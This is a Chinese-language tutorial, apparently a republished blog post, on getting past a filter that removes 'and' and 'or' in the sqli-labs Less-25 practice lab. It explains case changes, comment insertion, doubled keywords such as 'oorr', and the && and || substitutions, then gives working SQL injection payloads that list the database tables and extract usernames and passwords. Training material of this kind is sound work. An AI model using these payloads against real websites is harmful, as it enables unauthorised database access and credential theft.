SQL注入 绕过and和or过滤

Posted 山川绿水

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入 绕过and和or过滤相关的知识,希望对你有一定的参考价值。

SQL注入 绕过and和or过滤

1.基础知识介绍

1.mysql中的大小写不敏感,大写与小写一样。
2.MySQL中的十六进制与URL编码
3.符号和关键字替换and – &&、or–||
4.内联注释与多行注释

/*! 内联注释*/
/*多行注释*/

2.去除and和or的代码分析

preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个正则表达式的搜索和替换。
$pattern:要搜索的模式,可以是字符串或一个字符串数组
$replacement:用于替换的字符串或字符串组。
$subject:要搜索替换的目标字符串或字符串数组

$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);

值得一说的是preg_replace函数后面的/i是指ignore,就是忽略大小写

3.绕过去除and和or的SQL注入

1.大小写变形,Or,OR,oR,OR,And,ANd,aND等 代码中大小写不敏感都被剔除
2.在这两个敏感词汇中添加注释,例如:a/**/nd 双写绕过 oorr
3.利用符号替代——and --&& or–||
我们以sqli-labs-less25为例
1.当我们输入1时,回显正常,当我们输入1\\时报错


2.可以判断出,此sql注入为字符型,判断and,or等关键字是否被过滤

?id=1' and 1=1#


3.发现andor被过滤为空,这里我使用的是双写绕过

?id=1' oorr 1=1--+


4.爆破数据库

5.爆破数据表

?id=-1'and union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3%23

6.爆破字段名

7.爆破字段内容
获取用户名和密码

?id=-1' union select 1,(select group_concat(username,passwoorrd) from users),3--+

以上是关于SQL注入 绕过and和or过滤的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入 union和select替换为空绕过

sql注入详解

sql注入 form过滤怎么绕过

SQL注入绕过速查表

【模拟环境】SQL注入时如何绕过逗号和百分号

如何手动绕过SQL注入过滤器?